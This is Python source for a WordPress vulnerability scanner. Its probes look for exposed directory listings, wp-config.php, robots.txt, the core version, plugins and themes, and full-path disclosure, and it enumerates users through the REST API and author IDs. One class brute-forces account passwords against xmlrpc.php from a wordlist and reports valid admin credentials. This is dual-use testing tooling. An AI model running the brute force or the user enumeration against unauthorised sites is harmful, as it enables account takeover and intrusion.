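class wplisting:
    """Report WordPress directories that appear to expose a directory index.

    Each path in ``paths`` is fetched with the configured cookie. A hit is
    reported only when the server answers 200 for the exact URL (no
    redirect) and the body carries the ``Index of`` text that the stock
    Apache mod_autoindex and nginx autoindex pages emit. The marker check
    is the fix here: a directory served by its own ``index.php`` (WordPress
    ships one in wp-content/plugins and wp-content/themes) also answers 200
    with a near-empty body, so status code alone produced false positives.
    A server with a customised listing template may be missed.
    """

    chk = wphttp.UCheck()
    out = wpprint.wpprint()

    # Title/heading text of the default Apache and nginx autoindex pages.
    LISTING_MARKER = 'Index of'

    def __init__(self, agent, proxy, redir, time, url, cookie):
        self.url = url
        self.cookie = cookie
        self.req = wphttp.wphttp(agent=agent,
                                 proxy=proxy,
                                 redir=redir,
                                 time=time)

    def run(self):
        """Probe the well-known directories and print each apparent listing."""
        paths = [
            '/wp-admin', '/wp-includes', '/wp-content/uploads',
            '/wp-content/plugins', '/wp-content/themes'
        ]
        for path in paths:
            try:
                url = wplisting.chk.path(self.url, path)
                resp = self.req.send(url, c=self.cookie)
            except Exception:
                # Best effort: one unreachable path must not abort the
                # remaining probes (the original stopped at the first error).
                continue
            if resp.status_code != 200 or resp._content is None:
                continue
            # A redirect (wp-admin -> wp-login.php, for instance) means the
            # directory itself was not served.
            if resp.url != url:
                continue
            if wplisting.LISTING_MARKER in resp._content:
                wplisting.out.plus(
                    'Dir {} listing enabled under: {}'.format(
                        path, resp.url))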
class wplogin:
    """Probe ``/wp-login.php`` and report whether it answers directly.

    Only an un-redirected answer for the exact URL is considered: a 200 is
    printed as "no protection detected", a 404 as "protection detected"
    (the login page has been moved or hidden). Other status codes and any
    request error are ignored; this is a best-effort probe.
    """

    chk = wphttp.UCheck()
    out = wpprint.wpprint()

    def __init__(self, agent, proxy, redir, time, url, cookie):
        self.url = url
        self.cookie = cookie
        self.req = wphttp.wphttp(agent=agent,
                                 proxy=proxy,
                                 redir=redir,
                                 time=time)

    def run(self):
        """Send the probe and print the verdict for the login page."""
        # Message per status code; anything else produces no output.
        verdicts = {
            200: 'wp-login not detect protection under: {}',
            404: 'wp-login detect protection under: {}',
        }
        try:
            target = wplogin.chk.path(self.url, '/wp-login.php')
            resp = self.req.send(target, c=self.cookie)
            # A redirected answer tells us nothing about the login page.
            if resp.url != target:
                return
            template = verdicts.get(resp.status_code)
            if template is not None:
                wplogin.out.plus(template.format(resp.url))
        except Exception:
            pass
class wpconfig:
    """Check whether ``/wp-config.php`` is served as PHP source.

    A 200 answer for the exact URL whose body contains a ``define(``
    statement is reported as an exposed configuration file (that file
    normally holds the database credentials and salts). Afterwards the
    backup-file probe ``wpbk`` (defined elsewhere in this class) is run.
    Request errors are swallowed: best-effort probe.
    """

    chk = wphttp.UCheck()
    out = wpprint.wpprint()

    def __init__(self, agent, proxy, redir, time, url, cookie):
        self.url = url
        self.cookie = cookie
        self.req = wphttp.wphttp(agent=agent,
                                 proxy=proxy,
                                 redir=redir,
                                 time=time)

    def run(self):
        """Fetch wp-config.php, report raw source, then run the backup probe."""
        try:
            target = wpconfig.chk.path(self.url, '/wp-config.php')
            resp = self.req.send(target, c=self.cookie)
            # All three conditions must hold before the body is inspected.
            served_raw = (resp.status_code == 200
                          and resp._content is not None
                          and resp.url == target
                          and re.search(r'\S+define(\S+,*)', resp._content))
            if served_raw:
                wpconfig.out.plus(
                    'wp-config available under: {}'.format(resp.url))
            # Runs regardless of the outcome above, as before.
            self.wpbk()
        except Exception:
            pass
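class wpfile:
    """Probe the target for every file name listed in ``db/common_file.txt``.

    The wordlist is resolved against the current working directory, one
    name per line. A name is reported when the server answers 200 for the
    exact URL (no redirect) with a body present.
    """

    chk = wphttp.UCheck()
    out = wpprint.wpprint()

    def __init__(self, agent, proxy, redir, time, url, cookie):
        self.url = url
        self.cookie = cookie
        self.req = wphttp.wphttp(agent=agent,
                                 proxy=proxy,
                                 redir=redir,
                                 time=time)

    def run(self):
        """Read the wordlist and request each entry, printing the hits."""
        # The handle is closed as soon as the list is read (the original
        # left it open for the lifetime of the process); an unreadable
        # wordlist is reported instead of raising out of the scan.
        try:
            with open('db/common_file.txt', 'rb') as db:
                names = [line.strip() for line in db]
        except (IOError, OSError) as e:
            wpfile.out.warning(e)
            return
        for name in names:
            # A blank line (typically the last one) would probe the site root.
            if not name:
                continue
            try:
                url = wpfile.chk.path(self.url, name)
                resp = self.req.send(url, c=self.cookie)
            except Exception:
                # Best effort: one failed request must not end the whole
                # scan (the original aborted on the first error).
                continue
            if (resp.status_code == 200 and resp._content is not None
                    and resp.url == url):
                wpfile.out.plus('Found {} file under: {}'.format(
                    name, resp.url))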
class wprobots:
    """Fetch ``/robots.txt``; record its URL in ``result.robots`` and dump it."""

    chk = wphttp.UCheck()
    out = wpprint.wpprint()

    def __init__(self, agent, proxy, redir, time, url, cookie, result):
        self.url = url
        self.result = result
        self.cookie = cookie
        self.req = wphttp.wphttp(agent=agent,
                                 proxy=proxy,
                                 redir=redir,
                                 time=time)

    def run(self):
        """Request robots.txt and print its body when served with 200.

        Only an un-redirected answer for the exact URL counts. Any request
        error is ignored (best-effort probe).
        """
        try:
            target = wprobots.chk.path(self.url, '/robots.txt')
            resp = self.req.send(target, c=self.cookie)
            served = (resp.status_code == 200
                      and resp._content is not None
                      and resp.url == target)
            if not served:
                return
            self.result.robots = resp.url
            wprobots.out.plus('Robots available under: {}'.format(resp.url))
            rule = "-------------------------"
            print("{}\r\n{}\n{}".format(rule, resp._content, rule))
        except Exception:
            pass
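class wpversion:
    """Fingerprint the WordPress core version from public endpoints.

    The probes in ``PROBES`` are tried in order; the first one that yields
    a version string wins, the version is printed and handed to
    ``dbwpscan`` (defined elsewhere in this class).

    Fix: the original chained the probes with nested ``try``/``except``, so
    a later probe only ran when an earlier one *raised*. A 200 answer that
    simply did not contain a version ended the search with no result, and
    an exception inside ``dbwpscan`` wrongly restarted the chain. Here a
    probe that fails or finds nothing just falls through to the next one.
    """

    chk = wphttp.UCheck()
    out = wpprint.wpprint()

    # (path, regex capturing the version), in preference order. Patterns are
    # the original ones; 'readme.html' has no leading slash as before.
    PROBES = [
        ('/wp-links-opml.php', r'\S+WordPress/(\d+.\d+[.\d+]*)'),
        ('/feed', r'\S+?v=(\d+.\d+[.\d+]*)'),
        ('/feed/atom',
         r'<generator uri="http://wordpress.org/" version="(\d+\.\d+[\.\d+]*)"'),
        ('readme.html',
         r'.*wordpress-logo.png" /></a>\n.*<br />.* (\d+\.\d+[\.\d+]*)\n</h1>'),
        ('', r'<meta name="generator" content="WordPress (\d+\.\d+[\.\d+]*)"'),
    ]

    def __init__(self, agent, proxy, redir, time, url, cookie):
        self.url = url
        self.agent = agent
        self.cookie = cookie
        self.req = wphttp.wphttp(
            agent=agent, proxy=proxy,
            redir=redir, time=time
        )

    def run(self):
        """Try each probe until one yields a version; report and look it up."""
        for path, pattern in wpversion.PROBES:
            version = self._probe(path, pattern)
            if version is None:
                continue
            wpversion.out.plus('Running WordPress version: {}'.format(version))
            try:
                self.dbwpscan(version)
            except Exception as e:
                # Lookup errors are reported, not silently swallowed.
                wpversion.out.warning(e)
            return

    def _probe(self, path, pattern):
        """Fetch ``path`` and return the first ``pattern`` match, or None.

        A transport error or a non-200 answer is treated as "no version"
        so the caller moves on to the next probe.
        """
        try:
            target = wpversion.chk.path(self.url, path)
            resp = self.req.send(target, c=self.cookie)
        except Exception:
            return None
        if resp.status_code != 200 or resp._content is None:
            return None
        found = re.findall(pattern, resp._content)
        return found[0] if found else None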
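class wpplugin:
    """Passively enumerate plugins from the target's front page.

    Plugin slugs are scraped from ``/wp-content/plugins/<slug>/`` references
    in the HTML. Each distinct slug is printed, inspected by the per-plugin
    helpers (``changelog``, ``fullpathdisc``, ``license``, ``listing``,
    ``readme``, ``dbwpscan`` — defined elsewhere in this class) and a
    record of the gathered attributes is appended to ``result.plugins``.

    Changes: the duplicated one-plugin / many-plugins branches are folded
    into a single loop; an error in one plugin's checks no longer aborts
    the enumeration of the others; ``result.plugins`` is always defined.
    """

    chk = wphttp.UCheck()
    out = wpprint.wpprint()

    # Slugs come from target-controlled HTML and are spliced into request
    # paths by the helpers; accept plain directory names only (no '..',
    # query characters or whitespace).
    SLUG_RE = re.compile(r'^[\w-][\w.-]*$')

    def __init__(self, agent, proxy, redir, time, url, cookie, result):
        self.url = url
        self.result = result
        self.cookie = cookie
        self.agent = agent
        self.req = wphttp.wphttp(
            agent=agent, proxy=proxy,
            redir=redir, time=time
        )

    def run(self):
        """Scrape, deduplicate and inspect the plugin slugs."""
        wpplugin.out.test('Passive enumerate plugins..')
        self.result.plugins = []
        try:
            target = wpplugin.chk.path(self.url, '')
            resp = self.req.send(target, c=self.cookie)
            found = re.findall(r'/wp-content/plugins/(.+?)/', resp.content)
        except Exception as e:
            wpplugin.out.warning(e)
            return

        # Order-preserving de-duplication.
        slugs = []
        for slug in found:
            if slug not in slugs and wpplugin.SLUG_RE.match(slug):
                slugs.append(slug)

        if not slugs:
            wpplugin.out.warning('Not found plugins..')
            return

        for slug in slugs:
            wpplugin.out.plus('Name: {}'.format(slug))
            info = type('', (), {})()
            info.name = slug
            try:
                self._inspect(slug, info)
            except Exception as e:
                # Report and continue with the next plugin.
                wpplugin.out.warning(e)
            self.result.plugins.append(vars(info))

    def _inspect(self, slug, info):
        """Run every per-plugin check for ``slug``, in the original order."""
        self.changelog(slug, info)
        self.fullpathdisc(slug)
        self.license(slug)
        self.listing(slug)
        self.readme(slug, info)
        self.dbwpscan(slug, info)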
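class wptheme:
    """Passively enumerate themes from the target's front page.

    Theme slugs are scraped from ``/wp-content/themes/<slug>/`` references
    in the HTML; each distinct slug is printed and inspected by the
    per-theme helpers (``info``, ``style``, ``changelog``, ``fullpathdisc``,
    ``license``, ``listing``, ``readme``, ``dbwpscan`` — defined elsewhere
    in this class).

    Fixes: the "Not found themes.." branch tested ``themes == None`` on a
    value that is always a list, so it could never fire; the duplicated
    one-theme / many-themes branches are a single loop; an error in one
    theme's checks no longer aborts the others.
    """

    chk = wphttp.UCheck()
    out = wpprint.wpprint()

    # Slugs come from target-controlled HTML and are spliced into request
    # paths by the helpers; accept plain directory names only.
    SLUG_RE = re.compile(r'^[\w-][\w.-]*$')

    def __init__(self, agent, proxy, redir, time, url, cookie):
        self.url = url
        self.cookie = cookie
        self.agent = agent
        self.req = wphttp.wphttp(agent=agent,
                                 proxy=proxy,
                                 redir=redir,
                                 time=time)

    def run(self):
        """Scrape, deduplicate and inspect the theme slugs."""
        wptheme.out.test('Passive enumerate themes..')
        try:
            target = wptheme.chk.path(self.url, '')
            resp = self.req.send(target, c=self.cookie)
            found = re.findall(r'/wp-content/themes/(.+?)/', resp.content)
        except Exception as e:
            wptheme.out.warning(e)
            return

        # Order-preserving de-duplication.
        slugs = []
        for slug in found:
            if slug not in slugs and wptheme.SLUG_RE.match(slug):
                slugs.append(slug)

        if not slugs:
            wptheme.out.warning('Not found themes..')
            return

        for slug in slugs:
            wptheme.out.plus('Name: {}'.format(slug))
            try:
                self._inspect(slug)
            except Exception as e:
                # Report and continue with the next theme.
                wptheme.out.warning(e)

    def _inspect(self, slug):
        """Run every per-theme check for ``slug``, in the original order."""
        self.info(slug)
        self.style(slug)
        self.changelog(slug)
        self.fullpathdisc(slug)
        self.license(slug)
        self.listing(slug)
        self.readme(slug)
        self.dbwpscan(slug)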
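class wpusers:
    """Enumerate WordPress user names via the REST API and ``?author=N``.

    When the detected core version is 4.7 or newer the public
    ``/wp/v2/users`` route is read first (the REST API is enabled by
    default from 4.7). Then author IDs 1-14 are requested through
    ``?author=N`` and the ``/author/<name>/`` links in each 200 answer are
    collected. ``run`` returns the distinct names in discovery order.

    Fix: the original compared the first *character* of each link
    (``i[0]``) and then appended ``author[0]``, so on a page with several
    author links only the first name was ever recorded. Also, an
    unparsable version string no longer raises out of ``run``.

    NOTE(review): ``result.users`` is initialised to ``[]`` and not filled
    anywhere in this excerpt — confirm against the full source.
    """

    chk = wphttp.UCheck()
    out = wpprint.wpprint()

    def __init__(self, agent, proxy, redir, time, url, cookie, result):
        self.url = url
        self.result = result
        self.cookie = cookie
        self.req = wphttp.wphttp(agent=agent,
                                 proxy=proxy,
                                 redir=redir,
                                 time=time)

    def run(self):
        """Collect user names; return them as an ordered, de-duplicated list."""
        wpusers.out.test('Enumerate users..')
        df_users = []
        self.result.users = []

        if self._rest_api_expected():
            for slug in self._names_from_rest():
                if slug not in df_users:
                    df_users.append(slug)

        # Use the normal enumeration method
        for author_id in range(1, 15):
            path = "/?author={}".format(str(author_id))
            try:
                url = wpusers.chk.path(self.url, path)
                resp = self.req.send(url, c=self.cookie)
                if resp.status_code != 200:
                    continue
                found = re.findall(r'/author/(.+?)/', resp.content)
            except Exception:
                continue
            for name in found:
                if name not in df_users:
                    df_users.append(name)
        return df_users

    def _rest_api_expected(self):
        """True when ``result.version`` is known and is 4.7 or newer.

        A version StrictVersion cannot parse (pre-release tag, stray
        suffix) is treated as unknown rather than raising.
        """
        if not self.result.version:
            return False
        try:
            return (StrictVersion(self.result.version) >=
                    StrictVersion("4.7"))
        except ValueError:
            return False

    def _names_from_rest(self):
        """Return the ``slug`` of each entry of ``/wp/v2/users`` (max 100).

        Any transport, status or JSON problem yields an empty list.
        """
        try:
            url = wpusers.chk.path(
                self.url, "/?rest_route=/wp/v2/users&per_page=100")
            resp = self.req.send(url, c=self.cookie)
            if resp.status_code != 200:
                return []
            authors = resp.json()
        except Exception:
            return []
        names = []
        for author in authors:
            # Entries without a slug are skipped instead of raising KeyError.
            slug = author.get('slug') if isinstance(author, dict) else None
            if slug:
                names.append(slug)
        return names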
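class wpusers:
    """Enumerate WordPress user names through the ``?author=N`` redirect.

    Author IDs 0-14 are requested; every ``/author/<login>/`` link found in
    a 200 answer is recorded once, together with the ``author`` value of
    the page that first mentioned it, and printed as ``ID - Login``.

    Fixes: the original compared the first *character* of each link
    (``i[0]``) and appended ``author[0]``, so only the first name on a
    page was recorded; the ``%20`` decode tested ``users[user][0]`` (a
    single character) and therefore never ran; the "Not found users"
    branch tested ``users == None`` on a list and was unreachable; and the
    printed "ID" was the list index, not the ``?author`` value.

    NOTE(review): the ID is that of the page a login was first seen on; a
    page that links to several authors attributes them all to its own ID.
    """

    chk = wphttp.UCheck()
    out = wpprint.wpprint()

    def __init__(self, agent, proxy, redir, time, url, cookie):
        self.url = url
        self.cookie = cookie
        self.req = wphttp.wphttp(agent=agent,
                                 proxy=proxy,
                                 redir=redir,
                                 time=time)

    def run(self):
        """Probe author IDs 0-14 and print every distinct login found."""
        wpusers.out.test('Enumerate users..')
        found = []      # (author id, login) in discovery order
        seen = set()
        for author_id in range(0, 15):
            path = "/?author={}".format(str(author_id))
            try:
                url = wpusers.chk.path(self.url, path)
                resp = self.req.send(url, c=self.cookie)
                if resp.status_code != 200:
                    continue
                logins = re.findall(r'/author/(.+?)/', resp.content)
            except Exception:
                continue
            for login in logins:
                if login not in seen:
                    seen.add(login)
                    found.append((author_id, login))

        if not found:
            wpusers.out.warning('Not found users :(')
            return
        for author_id, login in found:
            # Logins are lifted from URLs, so a space arrives as %20.
            wpusers.out.more(' ID: {}  -  Login: {}'.format(
                author_id, login.replace('%20', ' ')))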
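class wpxmlrpc:
    """Brute-force one WordPress account through ``/xmlrpc.php``.

    Every password in the ``wlist`` file is tried for ``user`` with a
    ``wp.getUsersBlogs`` call; a reply carrying ``isAdmin`` means the pair
    was accepted (``1`` = administrator). The loop stops at the first
    accepted pair.

    Fixes: user name and password are now XML-escaped before being placed
    in the request — a password containing ``&``, ``<`` or ``>`` used to
    corrupt the document and that candidate was silently never tested;
    the wordlist handle is closed; an unreadable wordlist is reported and
    the run ends (the original then hit a NameError that the outer
    ``except`` swallowed).

    Operator note: this sends one request per password with no delay;
    a login-lockout plugin or WAF in front of the target will see it and
    may lock the account.
    """

    chk = wphttp.UCheck()
    out = wpprint.wpprint()

    def __init__(self, agent, proxy, redir, time, url, cookie, wlist, user):
        self.url = url
        self.cookie = cookie
        self.wlist = wlist
        self.user = user
        self.req = wphttp.wphttp(agent=agent,
                                 proxy=proxy,
                                 redir=redir,
                                 time=time)

    def run(self):
        """Iterate the wordlist and report the first accepted credential."""
        # Function-scope import: the module header is outside this excerpt.
        from xml.sax.saxutils import escape

        wpxmlrpc.out.plus('Bruteforcing login via xmlrpc..')
        try:
            with open(self.wlist, 'rb') as db:
                # Strip only the line ending: spaces may be part of a password.
                passwords = [line.rstrip('\r\n') for line in db]
        except (IOError, OSError) as e:
            wpxmlrpc.out.warning(e)
            return

        # Both values are text-node content: escape them so the request
        # stays well-formed whatever the wordlist contains.
        safe_user = escape(self.user)
        template = ('<methodCall><methodName>wp.getUsersBlogs</methodName>'
                    '<params>'
                    '<param><value><string>{}</string></value></param>'
                    '<param><value><string>{}</string></value></param>'
                    '</params></methodCall>')
        try:
            url = wpxmlrpc.chk.path(self.url, '/xmlrpc.php')
            for passwd in passwords:
                if not passwd:
                    continue
                payload = template.format(safe_user, escape(passwd))
                resp = self.req.send(url, m="POST", p=payload, c=self.cookie)
                body = resp.content
                if re.search('<name>isAdmin</name><value><boolean>0</boolean>',
                             body):
                    wpxmlrpc.out.plus(
                        'Valid credentials: \"{}\" - \"{}\"'.format(
                            self.user, passwd))
                    break
                if re.search('<name>isAdmin</name><value><boolean>1</boolean>',
                             body):
                    wpxmlrpc.out.plus(
                        'Valid admin credentials: \"{}\" - \"{}\"'.format(
                            self.user, passwd))
                    break
            wpxmlrpc.out.passs()
        except Exception as e:
            wpxmlrpc.out.warning(e)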
class wpfpd:
    """Full-path-disclosure probe against ``/wp-includes/rss-functions.php``.

    Requesting that file directly is expected to make PHP emit a
    ``Fatal error`` page whose text includes the install path; the URL is
    reported when such a page comes back with status 200. Request errors
    are ignored (best-effort probe).
    """

    chk = wphttp.UCheck()
    out = wpprint.wpprint()

    def __init__(self, agent, proxy, redir, time, url, cookie):
        self.url = url
        self.cookie = cookie
        self.req = wphttp.wphttp(
            agent=agent, proxy=proxy,
            redir=redir, time=time
        )

    def run(self):
        """Fetch the file and report a 'Fatal error' body as a disclosure."""
        try:
            target = wpfpd.chk.path(self.url, '/wp-includes/rss-functions.php')
            resp = self.req.send(target, c=self.cookie)
            if resp.status_code != 200 or resp._content is None:
                return
            if re.search(r'Fatal error', resp._content) is not None:
                wpfpd.out.plus('Full Path Disclosure: {}'.format(resp.url))
        except Exception:
            pass
class fingerprint:
    """Fetch the target once and pass the answer to the fingerprinters.

    The response headers go to ``server.wpserver`` and ``headers.wpheaders``,
    the body to ``waf.wpwaf``; a trailing ``passs`` marker is printed when
    all three ran. Any error (request or fingerprinter) is ignored.
    """

    chk = wphttp.UCheck()
    out = wpprint.wpprint()

    def __init__(self, agent, proxy, redir, time, url, cookie):
        self.url = url
        self.cookie = cookie
        self.req = wphttp.wphttp(agent=agent,
                                 proxy=proxy,
                                 redir=redir,
                                 time=time)

    def run(self):
        """Issue the single request and run the three fingerprinters in order."""
        try:
            resp = self.req.send(self.url, c=self.cookie)
            hdrs = resp.headers
            server.wpserver().run(hdrs)
            waf.wpwaf().run(resp._content)
            headers.wpheaders().run(hdrs)
            wpprint.wpprint().passs()
        except Exception:
            pass
class wpxmlrpc:
    """Detect the XML-RPC endpoint with a GET to ``/xmlrpc.php``.

    A ``405 Method Not Allowed`` for the exact URL (no redirect) with a
    body present is taken as "endpoint present": it exists but rejects
    GET. Other status codes and request errors produce no output.
    """

    chk = wphttp.UCheck()
    out = wpprint.wpprint()

    def __init__(self, agent, proxy, redir, time, url, cookie):
        self.url = url
        self.cookie = cookie
        self.req = wphttp.wphttp(agent=agent,
                                 proxy=proxy,
                                 redir=redir,
                                 time=time)

    def run(self):
        """Send the GET probe and print the endpoint URL when it answers 405."""
        try:
            target = wpxmlrpc.chk.path(self.url, '/xmlrpc.php')
            resp = self.req.send(target, c=self.cookie)
            present = (resp.status_code == 405
                       and resp._content is not None
                       and resp.url == target)
            if present:
                wpxmlrpc.out.plus(
                    'XML-RPC Interface available under: {}'.format(
                        resp.url))
        except Exception:
            pass